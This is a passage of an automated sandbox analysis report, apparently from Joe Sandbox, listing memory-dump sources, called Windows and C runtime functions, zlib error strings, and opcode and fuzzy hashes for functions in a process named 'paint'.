                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F2B
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F3C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF564C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                                                                                                • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                                • Instruction ID: 61beec96e97131efd3c013a54083263a9fac423be72d3eb15e6dbd9ada95775e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B951C03AA08642A6E720EF71D9811A96768BF59784FC09135EA6EC77D2FF3DE4008740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                • Instruction ID: eee3c823fc881fc21cfe4bc9e261bd79af26559fa7f61b5d06186eabb499b955
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D111866B18B05DAEB00CBA0E8552A933A4FB19758F441E35DA6E877A4EF78D1588340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                • Instruction ID: a1a9a9fab821bdc07b198e79882312b254f558d08189583254a99053341128c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15C15876B1C28697D720CF59A14466AB7A5F795B85F808134DB5F87784EF3EE800CB00
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                                                                • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                                • Instruction ID: 813dcac832b629411cad8f6764b9d65285a7b25fb9c14ea966743f721ad99288
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F1A472A0A3C59BE7958F14C088B3AFAAAEF46744F454538DA5A873D0EF3ED941C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                                                • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                                • Instruction ID: bf38bf4bdb3cc73b201c2c7877cc2adca32fcb73bb4533c166dd0cf180f40708
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28B17D77A04B868BEB15CF29C44636837A4F785B88F55C825DE6E837A8DF3AD451C700
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                                                                • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                                • Instruction ID: a9764692cf196b1b657071043687f70e7be72781cfc9cb38518069fe076d81f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57E1B532A08646A6EB688F25865813D33A0FF46F48FA45175DA6F877D4EF2BE851C700
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                                                                • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                                • Instruction ID: ff6d81cb96ca947db5a6f49a7ddb63160a27be4d8a24ec7bc52c3292300989f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F891A572A192C697E7A48A14C498B3EBAAAFF45350F514139DA6B867C0EF3DE540CB00
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                                • Instruction ID: 2a75c06cdccf0d375d03c0d5dff1817b004744467cdfb21f64f4985c75671d58
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3517C72B186C196E724CE359801769A792E746B94F889271CB7D87BC6EFBEE044C700
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                • Instruction ID: 8afe3fc3524d0eda2bf693267bb62656179b287236e0b2173fa557071910e25f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0A16763B087C556EB21CF25A4007A97B91EB627C4F458171DEAE877C5EEBEE501C700
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                                                • Instruction ID: dbb1ac001a5759ab6cfa1e9cfd5518e748cf5666c63f19a023bfb52e4c78753e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5051DE09F08A4271FB64AB26590117A5295AF86BC4FC855B4DE2FC77D2FE3EF4028200
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                                • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                                • Instruction ID: 501b365ff9e935f7298d7e7ddb6d2741dd84381c00bd483b04cc63e01d490d43
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58B09224E07A02E2EF082B656C8661826A87F58701F980138C02D81370EE3C20E55700
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                • Instruction ID: 48a7e2223c719c0503986083ac6f612477f76236eda850cc1ea1da754b189a27
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71D1D8A6A0864265EB688E25825863D33A0EF47F48F954275CE2F877D5EF3FE845C340
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                • Instruction ID: 839847ae1af61c489fd16c76e75cd453fac5922a8fddb8aa7e2dfc53dd91dd61
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96C18D762281E08BD289EB29E87947A73D1F78A30DBD5406BEF87477C5CA3CA514DB10
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                • Instruction ID: f71af0e7937cfd9783f52e275d11338553105824eae40416de56736f4054c508
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FB17B72A0879595EB648F29C45023C3BB0FB4AB48FA841B5CB5E873D5EF3AE841C740
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                • Instruction ID: b02b44d9b02988c685565729100f05432684a321b2af1ff3b9a5372e4971b4fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
